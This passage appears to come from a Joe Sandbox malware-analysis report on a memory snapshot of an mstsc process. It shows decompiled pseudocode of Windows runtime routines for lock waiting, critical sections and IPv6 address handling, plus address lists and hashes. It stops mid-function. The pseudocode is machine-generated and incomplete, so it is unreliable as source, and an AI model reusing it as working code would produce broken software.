0x026223ab
0x026223ad
0x00000000
0x026223b3
0x026223b3
0x026223b4
0x026223b9
0x026223ba
0x026223ba
0x026223bc
0x026223bf
0x00000000
0x00000000
0x02619153
0x02619158
0x0261915a
0x0261915e
0x02619160
0x00000000
0x02619166
0x02619166
0x02619171
0x02619176
0x02619176
0x00000000
0x02619160
0x026223c6
0x026223d7
0x026223d7
0x026223ad
0x02622390
0x02622373
0x0262233f
0x0262233f
0x00000000
0x0262233f
0x02622291
0x02622291
0x02622293
0x02622295
0x0262229a
0x026222a1
0x026222a3
0x026222a7
0x026222a9
0x00000000
0x00000000
0x026222ab
0x026222ad
0x026222af
0x00000000
0x00000000
0x00000000
0x026222af
0x026222b1
0x026222b4
0x026222b4
0x026222b6
0x025e53be
0x025e53be
0x025e53be
0x025e53c0
0x00000000
0x00000000
0x025e53cb
0x025e53ce
0x025e53d0
0x025e53d4
0x025e53d6
0x00000000
0x025e53d8
0x025e53e3
0x025e53ea
0x025e53ea
0x00000000
0x025e53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x026222b6
0x00000000
0x0262228f
0x02622349
0x0262234d
0x02622251
0x02622251
0x00000000
0x02622251
0x026221a4
0x026221a4
0x026221a6
0x026221a8
0x026221ac
0x026221b6
0x026221b8
0x026221bc
0x026221be
0x00000000
0x00000000
0x026221c0
0x026221c2
0x026221c4
0x00000000
0x00000000
0x00000000
0x026221c4
0x026221c6
0x026221c6
0x026221c8
0x00000000
0x00000000
0x00000000
0x00000000
0x026221c8
0x026221a2
0x00000000
0x02622183
0x0260057b
0x0260057d
0x02600581
0x02600583
0x02622178
0x00000000
0x02600589
0x0260058f
0x0260058f
0x02600583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02622206

Strings

RTL: Re-Waiting, xrefs: 0262223A, 02622328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0262220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026222FC
RTL: Resource at %p, xrefs: 0262221D, 0262230B

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: d5faa3369b012cda4a5575a2ba134e1324e171e36c22f8c614164ee387820cf9
Instruction ID: 2ef1f986935ca2b13b55c9fa54c7977dd7bfa71d2443e35035345f24f9618bd9
Opcode Fuzzy Hash: d5faa3369b012cda4a5575a2ba134e1324e171e36c22f8c614164ee387820cf9
Instruction Fuzzy Hash: 305139357006216FEB198E18CCD0FA633AAAF84724F25826DFD45DB384EA31EC458F94

Uniqueness

Uniqueness Score: -1.00%

Function 026014C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E026014C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x26a2088; // 0x7614a8e1
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E025F7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E026013CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E025F7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E025F7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E025C2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E025CE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x026014c0
0x026014cb
0x026014d2
0x026014d6
0x026014da
0x026014de
0x026014e3
0x0260157a
0x0260157a
0x026014f1
0x026014f3
0x0262ea0f
0x00000000
0x0262ea15
0x00000000
0x0262ea15
0x026014f9
0x026014f9
0x026014fe
0x02601504
0x0262ea1a
0x0262ea1f
0x0262ea21
0x0262ea22
0x0262ea27
0x0262ea2a
0x0262ea2a
0x02601515
0x02601517
0x0260156d
0x02601572
0x02601575
0x02601575
0x0260151e
0x0262ea50
0x0262ea55
0x0262ea58
0x0262ea58
0x0260152e
0x02601531
0x02601533
0x00000000
0x02601535
0x02601541
0x02601549
0x02601549
0x02601533
0x026014f3
0x02601559

APIs

___swprintf_l.LIBCMT ref: 0262EA22

Part of subcall function 026013CB: ___swprintf_l.LIBCMT ref: 0260146B
Part of subcall function 026013CB: ___swprintf_l.LIBCMT ref: 02601490

___swprintf_l.LIBCMT ref: 0260156D

Strings

%%%u, xrefs: 02601564
]:%u, xrefs: 0262EA47

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 38fede205ed9464856a084cc838c998ae4187211f5382ae6fe44a04f6c71aba4
Instruction ID: a7b0e7c4039191e366b9a6ef0955c4985560ffc78be263083c1d25413f6354fa
Opcode Fuzzy Hash: 38fede205ed9464856a084cc838c998ae4187211f5382ae6fe44a04f6c71aba4
Instruction Fuzzy Hash: 0F21F9B29002199FDB25DE54CC40AEF73BCBB55704F444456EC4AD7240EB70EA598FD0

Uniqueness

Uniqueness Score: -1.00%

Function 025E53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E025E53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026a01c0;
									_push(_t92);
									_push(0);
									_t37 = E025BF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02604FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02613F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02613F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0264217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02613F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02603915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E025E5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E025BF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02603915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E025BF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02603915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E025BF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02603915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E025E5329(_t74, _t92);
													_push(1);
													return E025E53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x025e53ab
0x025e53ae
0x025e53b1
0x025e53b4
0x025e53b7
0x026005b6
0x026005c0
0x026005c3
0x00000000
0x026005c9
0x026005c9
0x026005cc
0x026005d5
0x026005d5
0x025e53bd
0x025e53bd
0x025e53bd
0x025e53be
0x025e53be
0x025e53be
0x025e53c0
0x00000000
0x00000000
0x02622269
0x0262226d
0x02622349
0x0262234d
0x02622273
0x02622276
0x02622279
0x0262227e
0x02622283
0x02622287
0x0262228a
0x0262228d
0x0262228f
0x026222bc
0x026222bc
0x026222bc
0x026222be
0x026222c4
0x026222cc
0x026222d0
0x026222d6
0x026222d7
0x026222da
0x026222df
0x026222e4
0x00000000
0x00000000
0x026222e6
0x026222e9
0x026222f4
0x026222f9
0x026222fa
0x02622305
0x02622314
0x02622319
0x0262231a
0x0262231d
0x02622320
0x02622323
0x02622323
0x02622328
0x0262232d
0x0262232f
0x02622331
0x02622336
0x02622336
0x0262233b
0x0262233d
0x02622350
0x02622351
0x02622356
0x02622359
0x02622359
0x0262235b
0x0262235d
0x025e5367
0x025e536b
0x025e5372
0x00000000
0x00000000
0x00000000
0x00000000
0x02622363
0x02622363
0x02622369
0x0262236a
0x0262236c
0x02622371
0x02622373
0x00000000
0x02622379
0x02622379
0x0262237a
0x0262237f
0x0262237f
0x02622385
0x02622386
0x02622389
0x0262238e
0x02622390
0x025e5378
0x025e537c
0x02622396
0x02622396
0x02622397
0x0262239c
0x026223a2
0x026223a3
0x026223a6
0x026223ab
0x026223ad
0x00000000
0x026223b3
0x026223b3
0x026223b4
0x026223b9
0x026223ba
0x026223ba
0x026223bc
0x026223bf
0x00000000
0x00000000
0x02619153
0x02619158
0x0261915a
0x0261915e
0x02619160
0x00000000
0x02619166
0x02619166
0x02619171
0x02619176
0x02619176
0x00000000
0x02619160
0x026223c6
0x026223cb
0x026223d7
0x026223d7
0x026223ad
0x02622390
0x02622373
0x0262233f
0x0262233f
0x00000000
0x0262233f
0x02622291
0x02622291
0x02622293
0x02622295
0x0262229a
0x026222a1
0x026222a3
0x026222a7
0x026222a9
0x00000000
0x00000000
0x026222ab
0x026222ad
0x026222af
0x00000000
0x00000000
0x00000000
0x026222af
0x026222b1
0x026222b4
0x026222b4
0x026222b6
0x00000000
0x00000000
0x00000000
0x00000000
0x026222b6
0x0262228f
0x00000000
0x0262226d
0x025e53cb
0x025e53ce
0x025e53d0
0x025e53d4
0x025e53d6
0x00000000
0x025e53d8
0x025e53e3
0x025e53ea
0x025e53ea
0x025e53d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026222F4

Strings

RTL: Re-Waiting, xrefs: 02622328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026222FC
RTL: Resource at %p, xrefs: 0262230B

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: e252a658c40b71fe46a416bd779664e76739b005401af460dc5259f91f508b3a
Instruction ID: 129c1ff3322046ed91368141e33a65a04566d1f649e2e7daef696ab941fb45de
Opcode Fuzzy Hash: e252a658c40b71fe46a416bd779664e76739b005401af460dc5259f91f508b3a
Instruction Fuzzy Hash: BB51F6716016166BEF199F28CC90FA773AABF88324F114219FD05DB280FB61E8458F98

Uniqueness

Uniqueness Score: -1.00%

Function 025EEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E025EEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E025DDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x26a793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025C16C0(_t39);
				} else {
					_t40 = E025BF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02603915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025C01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x26a793c; // 0x0
								_push(_t85);
								_t44 = E025C1F28(_t71);
							} else {
								_t44 = E025BF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02603915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02642306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E025EEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02604FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02613F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02613F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26a20c0;
								if(_t85 != 0x26a20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0264217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02613F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x025eec56
0x025eec56
0x025eec56
0x025eec5c
0x025eec64
0x026223e6
0x026223eb
0x026223eb
0x025eec6a
0x025eec6c
0x025eec6f
0x026223f3
0x026223f8
0x026223fa
0x026223fc
0x025eec75
0x025eec76
0x025eec76
0x025eec7b
0x025eec7c
0x025eec7e
0x02622406
0x02622407
0x0262240c
0x0262240d
0x0262240d
0x0262240d
0x02622414
0x02622417
0x0262241e
0x02622435
0x02622438
0x0262243c
0x0262243f
0x02622442
0x02622443
0x02622446
0x02622449
0x02622453
0x02622455
0x0262245b
0x0262245b
0x025eeb99
0x025eeb99
0x025eeb9c
0x025eeb9d
0x025eeb9f
0x025eeba2
0x02622465
0x0262246b
0x0262246d
0x025eeba8
0x025eeba9
0x025eeba9
0x025eebae
0x025eebb3
0x025eebb9
0x025eebbb
0x02622513
0x02622514
0x02622519
0x0262251b
0x025eec2a
0x025eec2d
0x025eec33
0x025eec36
0x025eec3a
0x025eec3e
0x025eec40
0x025eec47
0x025eec47
0x025eec40
0x025c22c6
0x025eebc1
0x025eebc1
0x025eebc5
0x025eec9a
0x025eec9a
0x025eebd6
0x025eebd6
0x00000000
0x025eebbb
0x02622477
0x0262247c
0x02622486
0x0262248b
0x02622496
0x0262249b
0x0262249d
0x026224a0
0x026224a3
0x026224aa
0x026224aa
0x026224a5
0x026224a5
0x026224a5
0x026224ac
0x026224af
0x026224b0
0x026224b3
0x026224b9
0x026224ba
0x026224bb
0x026224c6
0x026224cb
0x026224cd
0x026224d0
0x026224d1
0x026224d4
0x026224d6
0x026224d9
0x026224d9
0x026224dc
0x026224df
0x026224e1
0x026224e7
0x026224e9
0x026224ec
0x026224ef
0x026224f2
0x026224f2
0x026224ef
0x026224e7
0x026224fa
0x026224ff
0x02622501
0x02622503
0x02622506
0x0262250b
0x025eeb8c
0x025eeb93
0x00000000
0x00000000
0x025eeb93
0x00000000
0x025eeb99
0x025eec85
0x025eec85
0x025eec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 026224FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 026224BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0262248D

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: cc93332e918b2783693b56a52fbd691adfc53cfb08d5adb96879c38e1eb58626
Instruction ID: b8b26570d64b1d659d1dbdcd9a8726ac7c5fc01ad684bc6eeac0a2c329e95095
Opcode Fuzzy Hash: cc93332e918b2783693b56a52fbd691adfc53cfb08d5adb96879c38e1eb58626
Instruction Fuzzy Hash: 6241C670600614AFDB24DF64CC95FAA77A9BF84720F208A09F9599B3C0D734E951CF69

Uniqueness

Uniqueness Score: -1.00%

Function 025FFCC9 Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E025FFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E025FEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E025FEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E025F685D(_t167, 4) == 0) {
								if(E025F685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
